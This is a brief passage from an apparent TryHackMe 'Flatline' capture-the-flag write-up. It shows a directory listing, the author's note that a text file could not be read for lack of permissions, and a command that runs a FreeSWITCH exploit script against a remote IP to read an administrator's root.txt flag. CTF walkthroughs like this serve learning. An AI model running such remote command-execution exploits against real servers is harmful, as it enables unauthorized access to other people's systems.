ajread4/thm_writeups_publish/Flatline.md

                2 File(s)             76 bytes
                2 Dir(s)  50,561,933,312 bytes free
 ```
 I tried to access it but it came up with the following output.
+Meaning, I was not able to read the txt file or I didnt have the proper permissions.
+My guess, I didnt have the proper permissions.
 ```
 ajread@aj-ubuntu:~/TryHackMe/practice$ python3 freeswitch.py [Remote IP] "type C:\Users\Nekrotic\Desktop\root.txt"
 Authenticated